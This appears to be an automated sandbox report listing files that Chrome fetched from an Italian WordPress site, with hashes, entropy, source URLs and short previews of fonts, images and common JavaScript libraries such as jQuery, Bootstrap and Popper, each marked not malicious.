                                                                                                                                          SSDEEP:24:81/nQOY7a4gwAZzhnQOY7a4g0tJc+u/rnQOY7a4gHwy96cGSSf7:coOEa4gvGOEa4gaJc+uUOEa4gHN0xD
                                                                                                                                          MD5:048827075038BB29A926100FAC103075
                                                                                                                                          SHA1:344B5CF6498867A1806DB0287F339B12C00F34B5
                                                                                                                                          SHA-256:88F23B85D81514D63DA43985D4E8BE67C1D4235E42768EBDC3783F88FB36C1E0
                                                                                                                                          SHA-512:CFFBB765A48E681EAF3D11CA60999C4886A2CD88CCFCA7B6260AECD880B17ED2764568418D6D4086049D6E0F296BAF33E8F8979017541877F0D96B1AF6A16C6E
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://fonts.googleapis.com/css?family=Archivo+Narrow&display=swap
                                                                                                                                          Preview:/* vietnamese */.@font-face {. font-family: 'Archivo Narrow';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/archivonarrow/v30/tss5ApVBdCYD5Q7hcxTE1ArZ0Zz8oY2KRmwvKhhvLFG6rHmsJCQ.woff2) format('woff2');. unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;.}./* latin-ext */.@font-face {. font-family: 'Archivo Narrow';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/archivonarrow/v30/tss5ApVBdCYD5Q7hcxTE1ArZ0Zz8oY2KRmwvKhhvLFG6rXmsJCQ.woff2) format('woff2');. unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./* latin */.@font-face {. font-family: 'Archivo Narrow';. font-style: normal;. font-weight
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):28
                                                                                                                                          Entropy (8bit):4.137537511266052
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:G4iCFCR:ziC4R
                                                                                                                                          MD5:AC2ACA9EAA84E1DEADB8507B24896865
                                                                                                                                          SHA1:39FEEC029B369917D2897C95FD450FF9EA64D08F
                                                                                                                                          SHA-256:881851041A64BE06D8BAFCFD2D1DD85F071FCD755178B529420DC5858141EF44
                                                                                                                                          SHA-512:A5389EDD199E38F65D350C560C8AC85545321FC4F169841F29F55CE3293C0C7454D38A709942235A3010EAAB91B99758CD5350629331AB0286BADBC9E4BFAD65
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwkhgCifVUyNjhIFDVNVgbUSBQ2MV9u3?alt=proto
                                                                                                                                          Preview:ChIKBw1TVYG1GgAKBw2MV9u3GgA=
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:Web Open Font Format, TrueType, length 2920, version 1.0
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):2920
                                                                                                                                          Entropy (8bit):7.781682974173635
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:f6GFz7+GdX7TM9ZO4UUcp70kerj/NzTQuixs+6i6wYCYFTYMAJ95k0m+37x7eQ8f:dl+e7Q9gTpAHeoqQCaTWJsO37x78jNH1
                                                                                                                                          MD5:76E3E18F3DA484EBBFBEB4A1848BFC22
                                                                                                                                          SHA1:E6C9509A3C311B00E1613A09B46599E1FFD8FBB4
                                                                                                                                          SHA-256:49D442C35200CA5E60BED45DCC94D7B154F7631640CE24149E37B99EF0702519
                                                                                                                                          SHA-512:7F7C4C4069D208CB5A4AF0FE3FE57CAA533AC20D68F608F0BC965389FA7256A5F74FFA2B42049E94AC0297B463370E5F370D6DB99C9B9BE24DA7D2D7A0FB37D5
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://www.agriparadigma.it/wp-content/themes/tentamus/dist/fonts/icons.woff
                                                                                                                                          Preview:wOFF.......h.......d........................OS/2.......@...VV.cBcmap...4...J...J ...glyf.............H..head...X...1...6..K.hhea...........$....hmtx...........<<...loca....... ... ...^maxp........... ....name.......=...I....post...8.......P.S.?x.c`da`........t.....B3.f0b.```b`ef....\S......X@...&.F ........x.c```f.`..F..p....|... .......,....*.A...P.@...@9`dbfaec............K.|..x..Vkl..............kv.;.../..k.^....`.B..l((...(.$....YP5&D.*R"....I.R.R.Ki....U..VI..y.U.m.Q.jC.........].}...o..{.....X...1.S....Y.d3*.....b,.._...u;.z......N.oZ..B..p .8*S.q..~..D.....L.$BHPn...h+@.....k...... @n.:.o'..........Q 3.P{.:....Z.w...8....".!i5..`.....X.).E+'B}..?...d=..............b}R.t.M..le{.O.D!.R.A%....w.9....=62..>....D>.!^.%i.B..2r..$....09H.#..8...$.._.7..pC..e......j..(k.qPtt.v....<.f;.(+:o.r..M.WT\,..mT'...5.m....*..YV.........q..m.%.Qhf.^..M.."O...&.....uVl.Y.V.l"YA}.=.x.E...:%..%....4$9.4....4...[......:.T.|...T5....x..........|B.....za..m]>.v.Ect",.>...
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:PNG image data, 42 x 245, 8-bit/color RGBA, non-interlaced
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):13065
                                                                                                                                          Entropy (8bit):7.977671396670077
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:bqRkXEI9QIaVGVtgPw5hJaqOQ1SFQajvxjW8BrLX1U/siCMG5OrpUtu9kwKL:bqRaEsuap5OQ161W8B3FUUEWOrpA/wKL
                                                                                                                                          MD5:C6E5EF7EC9288D17D3502A408F07D9B4
                                                                                                                                          SHA1:EB72BB4BE2F77F90DA7F9FAE06D623C9228ECE78
                                                                                                                                          SHA-256:A1825C2A3C207A1895C325BABEF34CEBC948EBEF7D7FEF1462456F48B730EE11
                                                                                                                                          SHA-512:4799FA3AA616CF6BF1CA26FBA8DA706E40F8F53144168787C60CCF91DF47679F2904825AFBD777430ACC74DFBB711F85FF6A528234F0D0CF7152BFDE45953278
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://www.agriparadigma.it/wp-content/themes/tentamus-labor/images/MemberTag.png
                                                                                                                                          Preview:.PNG........IHDR...*.........&.g.....gAMA......a...2.IDATx..].......H......B9..T.4a.s.a.3.9|6......f6.os.cl.(gF9VHR).H($....~..y...?.....>\..<......_..0..Q4%UKve....=...l..1#.,...Z5...hkZ.Z..].D...6#..I 6GMRj##..R.i!..b@.+t.*.....Viw...u.3Z..D....Sd..v..'%.T.+.2'..... .o&/;.>......r.j.u.L. ..@B'(uo,Po...x..m........-^<.....&;~..L...&..@...qPr..aLn..+....xzt....2.....@..g0*......:..E9......T`.....~.D.w..V...#[%`.......l.. ....-..c)!..X..`.x.._l;..e........fg....[.Z...Z...]...x...L.....>........>...GBI.NL..3:..|.....e.W.a ..@d(..Gh.9.n.0.N....r....2)".J.../...KY....Ehk.j.Qy......27.i.`....&....i.....mnw<..}..ivY\E=%..=....Ju...b.Ri'..tNy....6....M.^....%.^.5..O..Af.a.e.r.b.-....S-7.......l..j.WX..?.7..:.S...^..>..YZ\.c.w..I.;%..~,DW.,"..3._....d.>^`..t..._N...U..........6.jFkE.....'$u...>c.......3.O........P./=+y.K.....5[k..;..k...|..P...@...t...=..j?..{..g..#.NDz.+..V.....DH1.....u.f.k`AI[.M......o.E..mS.*...1.9l.d-.$aJ.Q.*....:K.F..ce..a`.y.-...
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1600x587, components 3
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):209711
                                                                                                                                          Entropy (8bit):7.990302169285806
                                                                                                                                          Encrypted:true
                                                                                                                                          SSDEEP:3072:JiM+7mXmbcGNKDA4d7297uSZ/4oOMh4f/mIPu6cSl1ii5rkgbiu0pNpEIXfhK1J5:gPcVOZQ/W49l1zV5bi7EIX5K5
                                                                                                                                          MD5:D8BBDF00EFE1C9076CA218B759732A93
                                                                                                                                          SHA1:713E918CE38ED99BBF7C378E7518623B6D6847C7
                                                                                                                                          SHA-256:02F6B392976C9D85761906420741FAB7A7029D3F81B66F729898B64EC0A47421
                                                                                                                                          SHA-512:1E5D7F495BB9A8911481D51AFD848C9B2BF7BF13D463252C4547F31DDE8C99C6FCB5F883DF80F7383429BFF73AFD31256E399F238369544640110C10468EDD8C
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:......JFIF.............C....................................................................C.......................................................................K.@.....................................................................................'_..*...J....E. .....@0....s....b...3M].....a....*O7p..#..e.....g.m....3bK.fS...B?+R.*....3...MG;:Zn..n[...\....3u..R 8\......v..T.10B.ZP.....r..s.5K...-...]..K.-..9L.j...\0nS;s.n6.|.....U"..V.m.VQ.U......J...."...U.....H..4M22.,hdH.+`..K.V.$..V.?.F8v."..@.0..3..=.<..JhJ....I.I......"m...a........+.bU3J.i.e....0 ......G...Kr...?5...Z.Q.I..H.-..*.{6.j..G-......{...E.U.1....g.f.|........L... ..Ta.a..S.....P.....c..\.5!\.5::.9......Rm..t}f...ZIc.Nd..z^.&5......!P....4..P.4.. ....QnsX.^rf...D.|xZ.0.....8.F"..r..!.M....[...?1v.(.........s........k......H.:....Wjs74H.v=4...CJ...e....80.l5..f.{y..B.D...jn...$....b..*9^.fu/=5|.....G.{f/.d...M..1.s....y.6'...(.6&T.!...)LU*..(50!)..k?.....f1R.......5eX\
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:Unicode text, UTF-8 text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):8074
                                                                                                                                          Entropy (8bit):4.253803575663342
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:B25NReIHosBA8bKSMahKSXf+39O3zlD5C+swhRWiru:BmrVPhD/D3y
                                                                                                                                          MD5:E3317D55AD904D30EA400A2DA2A56686
                                                                                                                                          SHA1:B998595F2C96F76BA65A808AC4029D66021195B4
                                                                                                                                          SHA-256:ECAC4FC801141CE552220BE4BB12969E2EE625E2CF08CF0EDBAC579A279B28F1
                                                                                                                                          SHA-512:DA9EE673041BD35EA7891EB08831E371CE8929484EAD6CA23E4B3ADBC96D20326955F265F4FAC7B1FE7889E90117564AEC63A10E62FBBE200F494D999B7F6834
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:var wpcf7_redirect;..(function ($) {. function Wpcf7_redirect() {. this.init = function () {. this.wpcf7_redirect_mailsent_handler();. };.. this.wpcf7_redirect_mailsent_handler = function () {.. document.addEventListener('wpcf7mailsent', function (event) {.. $(document.body).trigger('wpcf7r-mailsent', [event]);.. if (typeof event.detail.apiResponse != 'undefined' && event.detail.apiResponse) {. var apiResponse = event.detail.apiResponse;. var actionDelay = 0;.. //handle api response. if (typeof apiResponse.api_url_request != 'undefined' && apiResponse.api_url_request) {. wpcf7_redirect.handle_api_action(apiResponse.api_url_request);. }.. //handle api response. if (typeof apiResponse.api_json_xml_request != 'undefined' && apiResponse.api_json_xml_request) {.
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (10241), with no line terminators
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):10241
                                                                                                                                          Entropy (8bit):5.165608083920421
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:EajuLigkRhS1rNp7NWzdkfszvx3imWAel/L0Fx18b2Vauta2fI/OTz+UCR7:EajuLigWhS1rT7NW2fszhibLexa2VauK
                                                                                                                                          MD5:7BE65AC27024C7B5686F9D7C49690799
                                                                                                                                          SHA1:241ADA4A86443ADC5623D1A3A8018A96D9DE6D5A
                                                                                                                                          SHA-256:52DB930F81D97113DDE679CAC624CB5435B56D4AC486E91A0B6692D2CB615A84
                                                                                                                                          SHA-512:BBE6373705C81DA5C7C3C132583338B875CA76CD5F963DFBA95195BD8E2710E819B62924130F49B04FC0EA07E35677580924575D62E8CBCE75D1644CE5F96D15
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://www.agriparadigma.it/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=5.7.7
                                                                                                                                          Preview:(()=>{"use strict";var t={d:(e,s)=>{for(var i in s)t.o(s,i)&&!t.o(e,i)&&Object.defineProperty(e,i,{enumerable:!0,get:s[i]})},o:(t,e)=>Object.prototype.hasOwnProperty.call(t,e),r:t=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})}},e={};function s(t){if(this.formData={},this.tree={},!(t instanceof FormData))return this;this.formData=t;const e=()=>{const t=new Map;return t.largestIndex=0,t.set=function(e,s){""===e?e=t.largestIndex++:/^[0-9]+$/.test(e)&&(e=parseInt(e),t.largestIndex<=e&&(t.largestIndex=e+1)),Map.prototype.set.call(t,e,s)},t};this.tree=e();const s=/^(?<name>[a-z][-a-z0-9_:]*)(?<array>(?:\[(?:[a-z][-a-z0-9_:]*|[0-9]*)\])*)/i;for(const[t,i]of this.formData){const o=t.match(s);if(o)if(""===o.groups.array)this.tree.set(o.groups.name,i);else{const t=[...o.groups.array.matchAll(/\[([a-z][-a-z0-9_:]*|[0-9]*)\]/gi)].map((([t,e])=>e));t.unshift(o.groups.name);const s=t.pop
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (11126)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):11224
                                                                                                                                          Entropy (8bit):5.2603128465032745
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:JrprDNvD66fPP/+I6OP1fQP0OIr96DB6MHXcwr1RF:JrprxG6fPP3P1fQMOIsDsMMS
                                                                                                                                          MD5:79B4956B7EC478EC10244B5E2D33AC7D
                                                                                                                                          SHA1:A46025B9D05E3DF30D610A8AEF14F392C7058DC9
                                                                                                                                          SHA-256:029E0A2E809FD6B5DBE76ABE8B7A74936BE306C9A8C27C814C4D44AA54623300
                                                                                                                                          SHA-512:217F86FEE871FA36ECA4F25830E3917C7BF57A681140B135C508AA32F2A1E3EFF5A80661F3B5BA46747D0C305AF10B658D207F449550F3D417D9683216FEEA8F
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:/*! jQuery Migrate v3.3.2 | (c) OpenJS Foundation and other contributors | jquery.org/license */."undefined"==typeof jQuery.migrateMute&&(jQuery.migrateMute=!0),function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],function(e){return t(e,window)}):"object"==typeof module&&module.exports?module.exports=t(require("jquery"),window):t(jQuery,window)}(function(s,n){"use strict";function e(e){return 0<=function(e,t){for(var r=/^(\d+)\.(\d+)\.(\d+)/,n=r.exec(e)||[],o=r.exec(t)||[],i=1;i<=3;i++){if(+o[i]<+n[i])return 1;if(+n[i]<+o[i])return-1}return 0}(s.fn.jquery,e)}s.migrateVersion="3.3.2",n.console&&n.console.log&&(s&&e("3.0.0")||n.console.log("JQMIGRATE: jQuery 3.0.0+ REQUIRED"),s.migrateWarnings&&n.console.log("JQMIGRATE: Migrate plugin loaded multiple times"),n.console.log("JQMIGRATE: Migrate is installed"+(s.migrateMute?"":" with logging active")+", version "+s.migrateVersion));var r={};function u(e){var t=n.console;s.migrateDeduplicateWarnings&&r[e]||(r[e]=!0
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (32030)
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):86709
                                                                                                                                          Entropy (8bit):5.367391365596119
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:9NhEyjjTikEJO4edXXe9J578go6MWXqcVhrLyB4Lw13sh2bzrl1+iuH7U3gBORDT:jxcq0hrLZwpsYbmzORDU8Cu5
                                                                                                                                          MD5:E071ABDA8FE61194711CFC2AB99FE104
                                                                                                                                          SHA1:F647A6D37DC4CA055CED3CF64BBC1F490070ACBA
                                                                                                                                          SHA-256:85556761A8800D14CED8FCD41A6B8B26BF012D44A318866C0D81A62092EFD9BF
                                                                                                                                          SHA-512:53A2B560B20551672FBB0E6E72632D4FD1C7E2DD2ECF7337EBAAAB179CB8BE7C87E9D803CE7765706BC7FCBCF993C34587CD1237DE5A279AEA19911D69067B65
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://code.jquery.com/jquery-3.1.1.min.js
                                                                                                                                          Preview:/*! jQuery v3.1.1 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.1.1",r=function(a,b){return new r.fn.init(a,b)},s=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,t=/^-ms-/,u=/-([a-z])/g,v=function(a,b){return b.toUpperCase()};r.fn=r.prototype={jquery:q,constructor:r,length:0,toArray:function(){return f.call(this)},get:function(a){return null==a?f.call(this):a<0?this[a+this.length]:this[a]},pushStack:function(a){var b=r.merge(this.con
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (19015)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):19188
                                                                                                                                          Entropy (8bit):5.212814407014048
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:384:+CbuG4xGNoDic2UjKPafxwC5b/4xQviOJU7QzxzivDdE3pcGdjkd/9jt3B+Kb964:zb4xGmiJfaf7gxQvVU7eziv+cSjknZ3f
                                                                                                                                          MD5:70D3FDA195602FE8B75E0097EED74DDE
                                                                                                                                          SHA1:C3B977AA4B8DFB69D651E07015031D385DED964B
                                                                                                                                          SHA-256:A52F7AA54D7BCAAFA056EE0A050262DFC5694AE28DEE8B4CAC3429AF37FF0D66
                                                                                                                                          SHA-512:51AFFB5A8CFD2F93B473007F6987B19A0A1A0FB970DDD59EF45BD77A355D82ABBBD60468837A09823496411E797F05B1F962AE93C725ED4C00D514BA40269D14
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:/*. Copyright (C) Federico Zivolo 2017. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll)/.test(r+s+p)?e:n(o(e))}function r(e){var o=e&&e.offsetParent,i=o&&o.nodeName;return i&&'BODY'!==i&&'HTML'!==i?-1!==['TD','TABLE'].indexOf(o.nodeName)&&'static'===t(o,'position')?r(o):o:e?e.ownerDocument.documentElement:document.documentElement}functio
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 250x250, components 3
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):22321
                                                                                                                                          Entropy (8bit):7.973874223517888
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:384:IHJWQoKm4ujNw8qzu7DHfICsa7bBny1WOMLFLF7FJPJqaDTZrAt09gi1xjU:IpWQxmBjijzuPgCPf41WOMXzBVZgejU
                                                                                                                                          MD5:CF57B6CC3866961ACB55EDDB01CCF792
                                                                                                                                          SHA1:B9F27BD4DEECD194E0060078A450D55FBB129C10
                                                                                                                                          SHA-256:6958D2DC42AC10D0E81C6A1933D551C9B0ACC903FEB1CEE992A83C042E605215
                                                                                                                                          SHA-512:5D09A7BADBB60B324A21CEAE1D72F803680010ED3EF50E1998A9D6B46DFD3A2E4E5473B81053B2EB98C9F7011EDDF83655DF5A61025CF16ADF60E0172060782C
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://www.agriparadigma.it/wp-content/uploads/sites/71/2018/04/0000_03.jpg
                                                                                                                                          Preview:......JFIF.............C....................................................................C............................................................................................................................................................../.-_.m.[.....`...1/U.OH.zOI..r.S._N.q...d....+.....t......".JA(.2.pr.9..5S..2].5.IQd).....`.-G..Z...E........,..m..Y...6.2...?>.H#SU.?6..y.5X.U.u..X>...}.;.x...&.K.....5>..U..Z..+....1..W.8I.kQ.%.D.?=.mm.aU>..*9P.........M..r...g;.[.gm....<JA"...m...V.+..=dY...S-.).;...z..a.....w......ll]F=......k.....o.....s.r.%0...Y..\IM.l.\5......u..,XC.....H.w.5J_h..8={..Y~.j.G..qj5..zZIy._....L.K.L".u.n...IQ.FT..[...0.-9....c..zw9.z_..[..}n. ...L.t@..7T...="]Ec..60.R.?_.~..D`.K-.n.Y. .}.6.&.7?..^.j.OK...W....e.......K.O\IL..jpm.gW...m..}Q.KS.zOI..}Z.~=....k"..i%&.9..1..?8D.[..e.a^.Q.f.#b.M=.......!.V.2..%.RU..d..T[.gW.z.$..*..............@5....i...z.l].|{NF...k...%.=mY=R;.3.<.6.....H.%.;.3W_.5V...2.......V.tk
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (50758)
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):51039
                                                                                                                                          Entropy (8bit):5.247253437401007
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:E9Yw7GuJM+HV0cen/7Kh5rM7V4RxCKg8FW/xsXQUd+FiID65r48Hgp5HRl+:E9X7PMIM7V4R5LFAxTWyuHHgp5HRl+
                                                                                                                                          MD5:67176C242E1BDC20603C878DEE836DF3
                                                                                                                                          SHA1:27A71B00383D61EF3C489326B3564D698FC1227C
                                                                                                                                          SHA-256:56C12A125B021D21A69E61D7190CEFA168D6C28CE715265CEA1B3B0112D169C4
                                                                                                                                          SHA-512:9FA75814E1B9F7DB38FE61A503A13E60B82D83DB8F4CE30351BD08A6B48C0D854BAF472D891AF23C443C8293380C2325C7B3361B708AF9971AA0EA09A25CDD0A
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js
                                                                                                                                          Preview:/*!. * Bootstrap v4.1.3 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enum
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):751172
                                                                                                                                          Entropy (8bit):5.236356670525082
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:1U/hMWDvHsoz9kY3gzIWQYnb52DiiYlnPyAdNBiGedN9C/RumB6A:UDfBvQzIW32+iINAGIN9C/R9
                                                                                                                                          MD5:7BDE7C65C3492208C4FB67507C86B2B1
                                                                                                                                          SHA1:F96DC90842ADACAA08E9F95C0EDCC9D366D56B6D
                                                                                                                                          SHA-256:41982F37DCB6389966F16C8393176FFA87A2E4ECDA7315A05683A2A558AC0A10
                                                                                                                                          SHA-512:35ED0901D9490D95766850D4D9BF04A337D65E469C7287D50623B114A1A63246B80731B233002719AF1CAEA2EEE2307B7F982D8C69B9935B0EDCC9FA91BD0504
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://www.agriparadigma.it/wp-content/themes/tentamus/assets/scripts/amcharts4/core.js
                                                                                                                                          Preview:!function(t){var e=window.am4internal_webpackJsonp;window.am4internal_webpackJsonp=function(i,o,s){for(var a,u,l,h=0,c=[];h<i.length;h++)u=i[h],n[u]&&c.push(n[u][0]),n[u]=0;for(a in o)Object.prototype.hasOwnProperty.call(o,a)&&(t[a]=o[a]);for(e&&e(i,o,s);c.length;)c.shift()();if(s)for(h=0;h<s.length;h++)l=r(r.s=s[h]);return l};var i={},n={a74a:0};function r(e){if(i[e])return i[e].exports;var n=i[e]={i:e,l:!1,exports:{}};return t[e].call(n.exports,n,n.exports,r),n.l=!0,n.exports}r.e=function(t){var e=n[t];if(0===e)return new Promise(function(t){t()});if(e)return e[2];var i=new Promise(function(i,r){e=n[t]=[i,r]});e[2]=i;var o=document.getElementsByTagName("head")[0],s=document.createElement("script");s.type="text/javascript",s.charset="utf-8",s.async=!0,s.timeout=12e4,r.nc&&s.setAttribute("nonce",r.nc),s.src=r.p+"deps/"+({"0471":"canvg","076f":"pdfmake",bf3e:"xlsx"}[t]||t)+".js";var a=setTimeout(u,12e4);function u(){s.onerror=s.onload=null,clearTimeout(a);var e=n[t];0!==e&&(e&&e[1](new
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (19015)
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):19188
                                                                                                                                          Entropy (8bit):5.212814407014048
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:384:+CbuG4xGNoDic2UjKPafxwC5b/4xQviOJU7QzxzivDdE3pcGdjkd/9jt3B+Kb964:zb4xGmiJfaf7gxQvVU7eziv+cSjknZ3f
                                                                                                                                          MD5:70D3FDA195602FE8B75E0097EED74DDE
                                                                                                                                          SHA1:C3B977AA4B8DFB69D651E07015031D385DED964B
                                                                                                                                          SHA-256:A52F7AA54D7BCAAFA056EE0A050262DFC5694AE28DEE8B4CAC3429AF37FF0D66
                                                                                                                                          SHA-512:51AFFB5A8CFD2F93B473007F6987B19A0A1A0FB970DDD59EF45BD77A355D82ABBBD60468837A09823496411E797F05B1F962AE93C725ED4C00D514BA40269D14
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js
                                                                                                                                          Preview:/*. Copyright (C) Federico Zivolo 2017. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll)/.test(r+s+p)?e:n(o(e))}function r(e){var o=e&&e.offsetParent,i=o&&o.nodeName;return i&&'BODY'!==i&&'HTML'!==i?-1!==['TD','TABLE'].indexOf(o.nodeName)&&'static'===t(o,'position')?r(o):o:e?e.ownerDocument.documentElement:document.documentElement}functio
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 78168, version 331.-31196
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):78168
                                                                                                                                          Entropy (8bit):7.996980715595138
                                                                                                                                          Encrypted:true
                                                                                                                                          SSDEEP:1536:F9ht+In45PAr81N7kP5kBLz+1Lo3hJLld77YO6R5K0l:F7kISPSDxkBsk3hJllB66k
